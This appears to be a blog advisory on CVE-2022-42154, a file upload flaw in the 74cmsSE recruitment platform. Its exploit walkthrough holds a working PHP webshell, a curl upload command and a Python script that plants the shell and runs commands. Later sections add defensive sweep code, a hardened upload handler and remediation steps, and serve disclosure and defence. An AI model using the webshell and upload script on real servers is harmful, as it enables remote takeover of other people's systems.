Security vulnerabilities in web applications are a constant threat. One particularly dangerous bug is an arbitrary file upload vulnerability, which often leads to Remote Code Execution (RCE). In this post, we dive deep into CVE-2022-42154, found in the 74cmsSE v3.13. platform—a popular open-source recruitment system widely used in China and beyond. This vulnerability lets attackers upload malicious PHP files through the /apiadmin/upload/attach endpoint, giving them full control over the server.

Let's understand how this flaw works, see examples of how attackers exploit it, and learn how to protect affected systems.

What is 74cmsSE?

74cmsSE is a recruitment management platform built on PHP. Like many web-based systems, it allows users and admins to upload files—such as résumés, company logos, and more.

Endpoint in Focus

The vulnerable endpoint is:  

/apiadmin/upload/attach

This API is supposed to handle file uploads. However, in v3.13., it fails to restrict file types, contents, or extensions adequately. As a result, attackers can upload PHP files that the webserver will later execute.

What Does Arbitrary File Upload Mean?

Arbitrary file upload means that an attacker can upload any file type they want. The critical case is when an attacker can upload a PHP file (or another server-executable script) and then reach it through the server's public URL, because the webserver will execute it instead of serving it as static content.

Exploit Walkthrough

Here is a step-by-step explanation of how someone could exploit this vulnerability.

First, the attacker creates a simple PHP webshell. For example, the contents of cmd.php:

<?php
if(isset($_REQUEST['cmd'])){
    system($_REQUEST['cmd']);
}
?>


This little script lets the attacker run any command on the server, just by visiting the script and appending ?cmd=ls or ?cmd=id to the URL.

Next, the attacker uses a tool like curl or Burp Suite to upload the file. Example using curl:

curl -F "file=@cmd.php" http://target.com/apiadmin/upload/attach

Note: The actual parameter name might be different in practice (file, upload, or similar). The endpoint fails to check the extension or MIME type, so the upload goes through.

Then, the attacker needs to locate the uploaded file.

The server usually returns the upload path or filename in the response. If not, attackers can guess common upload directories—like /uploads/, /public/uploads/, or similar.

The attacker then accesses the uploaded PHP file via the web browser:

http://target.com/uploads/cmd.php?cmd=whoami

Now, the server executes any command passed as the cmd parameter, such as listing files, reading sensitive files, or adding a new admin user.

Below is a simple Python script to automate the attack:

import requests

# Upload endpoint on the target (replace target.com with the real host)
url = 'http://target.com/apiadmin/upload/attach'
# Multipart form field named 'file'; the real parameter name may differ per install
files = {'file': ('cmd.php', '<?php if(isset($_REQUEST["cmd"])) { system($_REQUEST["cmd"]); } ?>')}
resp = requests.post(url, files=files)
print('Upload response:', resp.text)

# Suppose the upload path is in the response or is known
shell_url = 'http://target.com/uploads/cmd.php'
cmd = {'cmd': 'whoami'}
shell_resp = requests.get(shell_url, params=cmd)
print('Command output:', shell_resp.text)


*Replace target.com and the upload path as needed.*
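The walkthrough above shows what lands on disk when this bug is abused: a PHP file in a directory that should only ever hold images and documents. The following script is an added example for defenders and is not part of the original post or of 74cmsSE. It sweeps an upload directory (path given on the command line; a constructed temporary directory with sample files is used when no path is supplied) and flags files that either carry a server-executable extension anywhere in their name or contain a PHP open tag despite a harmless-looking extension.

```php
<?php
// Added example, not 74cmsSE code: a post-advisory sweep of an upload
// directory for files that a PHP-enabled webserver might execute.
// Usage: php sweep.php /path/to/uploads   (runs on constructed samples if omitted)

declare(strict_types=1);

// Extensions commonly mapped to the PHP handler (assumption: typical Apache/PHP setup).
const SCRIPT_EXTENSIONS = ['php', 'php3', 'php4', 'php5', 'phtml', 'phar'];

/**
 * Walk $dir recursively and return [path => [reasons]] for suspicious files:
 * any executable extension in the name (catches "x.php.jpg" style names), or a
 * PHP open tag in the first 4 KiB regardless of extension (polyglot "images").
 */
function sweepUploads(string $dir): array
{
    $findings = [];
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $file) {
        if (!$file->isFile()) {
            continue;
        }
        $path = $file->getPathname();
        $reasons = [];

        // Every extension after the first dot, lower-cased
        $exts = array_map('strtolower', array_slice(explode('.', $file->getFilename()), 1));
        foreach ($exts as $ext) {
            if (in_array($ext, SCRIPT_EXTENSIONS, true)) {
                $reasons[] = "script extension .$ext";
                break;
            }
        }

        // Content check: "<?php" or "<?=" anywhere in the file header
        $head = (string) file_get_contents($path, false, null, 0, 4096);
        if (preg_match('/<\?(php|=)/i', $head)) {
            $reasons[] = 'PHP open tag in content';
        }

        if ($reasons !== []) {
            $findings[$path] = $reasons;
        }
    }
    ksort($findings);
    return $findings;
}

/**
 * Constructed sample data (not real artefacts): a benign PNG, an obvious
 * webshell like the one in the walkthrough, and a PHP payload hidden behind
 * a .jpg extension.
 */
function buildSample(): string
{
    $dir = sys_get_temp_dir() . '/uploads-' . bin2hex(random_bytes(4));
    mkdir($dir . '/2022/10', 0700, true);
    file_put_contents($dir . '/2022/10/logo.png', "\x89PNG\r\n\x1a\n" . str_repeat("\0", 32));
    file_put_contents($dir . '/2022/10/cmd.php', "<?php system(\$_REQUEST['cmd']);");
    file_put_contents($dir . '/2022/10/avatar.jpg', "\xFF\xD8\xFF\xE0 <?php echo 'x'; ?>");
    return $dir;
}

$dir = $argv[1] ?? buildSample();
foreach (sweepUploads($dir) as $path => $reasons) {
    echo $path, ': ', implode(', ', $reasons), PHP_EOL;
}
```

On the constructed sample the sweep reports cmd.php (script extension and open tag) and avatar.jpg (open tag only) and stays silent on logo.png. Pair the file list with the webserver access log: any request for a path under the upload directory that returns 200 with a query string is worth a look, since static images and PDFs are never fetched with parameters like the cmd= seen above.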

Original References

- CVE Details for CVE-2022-42154
- Exploit Database Entry
- Github Advisory for 74cmsSE

- Complete Site Takeover: They could deface, mine, or destroy all your content.

- Lateral Movement: Gaining a foothold might allow attackers to compromise other systems on the same network.

Remediation

If you manage a 74cmsSE v3.13. system, you must upgrade to the latest version immediately. If an update is not available, apply these temporary fixes:

- Restrict uploaded file types: Only allow image or document extensions (e.g., .jpg, .png, .pdf).

- Store uploads outside web root: Prevent direct web access to uploaded files.

- Apply webserver rules: Block execution of PHP files in upload directories, e.g., using .htaccess:

deny from all
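The three fixes above are the checks the vulnerable endpoint lacks (see "What Does Arbitrary File Upload Mean?"). Below is an added example of an attachment handler that applies all of them together; it is illustrative code written for this post, not 74cmsSE's own implementation. It assumes the multipart field is named file (the post notes the real parameter name may differ), that UPLOAD_DIR is a placeholder path outside the web root, and that a separate download script streams stored files back with a fixed Content-Type.

```php
<?php
// Added example, not 74cmsSE code: hardened handling for an attachment upload.
// Assumptions: form field "file"; UPLOAD_DIR is not served by the webserver.

declare(strict_types=1);

const UPLOAD_DIR = '/var/www/private_uploads';   // placeholder, outside web root
const MAX_BYTES  = 5 * 1024 * 1024;

// Allow-list: extension => MIME type that the file CONTENT must sniff as.
const ALLOWED = [
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
    'pdf' => 'application/pdf',
];

/**
 * Validate one $_FILES entry and store it under a random name.
 * Returns the stored filename or throws RuntimeException with the reason.
 */
function storeAttachment(array $upload): string
{
    $err = $upload['error'] ?? UPLOAD_ERR_NO_FILE;
    if ($err !== UPLOAD_ERR_OK) {
        throw new RuntimeException("upload failed with error code $err");
    }
    if ($upload['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    // 1. Extension allow-list on the client-supplied name. Anything not
    //    listed (php, phtml, htaccess, ...) is rejected outright.
    $ext = strtolower(pathinfo($upload['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException("extension '$ext' not allowed");
    }

    // 2. Content check: sniff the MIME type from the bytes on disk, never
    //    from the client's Content-Type header, and require a match.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $detected = $finfo->file($upload['tmp_name']);
    if ($detected !== ALLOWED[$ext]) {
        throw new RuntimeException("content type '$detected' does not match .$ext");
    }

    // 3. Never reuse the client's filename: a random name with a single
    //    allow-listed extension defeats traversal, double-extension and
    //    overwrite tricks, and the caller never learns a guessable path.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . DIRECTORY_SEPARATOR . $stored;

    // 4. move_uploaded_file() refuses anything that was not an HTTP upload.
    if (!move_uploaded_file($upload['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);   // no execute bit, not world-readable
    return $stored;
}

// Reply with the opaque stored name only; the file itself is later served by
// a download script that reads from UPLOAD_DIR and sends
// Content-Disposition: attachment, so nothing in it is ever interpreted.
header('Content-Type: application/json');
try {
    $name = storeAttachment($_FILES['file'] ?? []);
    echo json_encode(['ok' => true, 'file' => $name]);
} catch (RuntimeException $e) {
    http_response_code(400);
    echo json_encode(['ok' => false, 'error' => $e->getMessage()]);
}
```

The .htaccess line above is the defence-in-depth layer for installs that cannot yet move the directory: deny from all stops every direct request to the upload directory, which is exactly what you want once files are only reachable through the download script (on Apache 2.4 the equivalent directive is Require all denied). Keep both the code checks and the webserver rule; either one alone has a history of being bypassed by a configuration change.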

Final Thoughts

CVE-2022-42154 highlights the risks of insecure file upload functionalities. Even well-meaning features can be doors for attackers. Always validate and sanitize any user-supplied input, especially uploaded files. For 74cmsSE v3.13. users, patch now or risk a total compromise.

Stay secure and keep your systems patched!

*Original research and exclusive content by [YourName]. If you found this useful, share it with your team and community.*

Timeline

Published on: 10/17/2022 14:15:00 UTC
Last modified on: 10/19/2022 15:12:00 UTC